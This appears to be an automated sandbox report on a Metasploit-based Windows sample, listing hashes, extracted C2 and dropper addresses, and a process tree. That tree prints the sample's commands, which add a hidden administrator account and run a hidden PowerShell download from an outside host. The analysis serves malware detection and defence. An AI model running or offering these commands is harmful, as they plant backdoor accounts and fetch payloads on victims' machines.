Overview

overview

10

Static

static

10

sample1.exe

windows7-x64

10

sample1.exe

windows10-2004-x64

10

sample2.exe_

ubuntu-20.04-amd64

3

Analysis

  • max time kernel
    147s
  • max time network
    165s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01/06/2024, 17:34

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    sample1.exe

  • Size

    83KB

  • MD5

    dec37e4b834cf3a9a78475fec06255db

  • SHA1

    bc6a9f3dd99e40dfe34ba8c64401027a3d86d2bc

  • SHA256

    075a8576bb2f75bf56cfa8c88727011ac66f176ca5abe2a78978c556577e5058

  • SHA512

    8402a9206285014fe6ab3752433835a7f907406d2c5fb23204a567d3f9940c844578ee525c64b6a67d81bf0983e7d3972fb2380d822cc9fd08eec098749d4a77

  • SSDEEP

    1536:Icus7AQXjNta73Jah9UFBD3JMb+KR0Nc8QsJq3Gnq3+/q3DlHq3/:lAYhta7ouJe0Nc8QsCzDDm/

Score
10/10
metasploitbackdoorexecutiontrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://web.danger.mal/danger

Extracted

Family

metasploit

Version

windows/reverse_tcp_dns

C2

web.danger.net:5555

Extracted

Family

metasploit

Version

windows/exec

Signatures

  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

    trojanbackdoormetasploit
  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Runs net.exe
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\sample1.exe
    "C:\Users\Admin\AppData\Local\Temp\sample1.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3672
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c net user TestUser S3cret^S3cret /ADD && net localgroup Administrators TestUser /ADD
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1444
      • C:\Windows\SysWOW64\net.exe
        net user TestUser S3cretS3cret /ADD
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5044
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 user TestUser S3cretS3cret /ADD
          4⤵
            PID:4680
        • C:\Windows\SysWOW64\net.exe
          net localgroup Administrators TestUser /ADD
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4500
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 localgroup Administrators TestUser /ADD
            4⤵
              PID:764
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -ExecutionPolicy bypass -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('http://web.danger.mal/danger','C:/danger')"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          PID:4508

      Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • memory/3672-0-0x0000000000400000-0x000000000041B1FC-memory.dmp

              Filesize

              108KB

              Download

            • memory/3672-1-0x00000000006F0000-0x00000000006F1000-memory.dmp

              Filesize

              4KB

              Download

            • memory/3672-2-0x0000000000400000-0x000000000041B1FC-memory.dmp

              Filesize

              108KB

              Download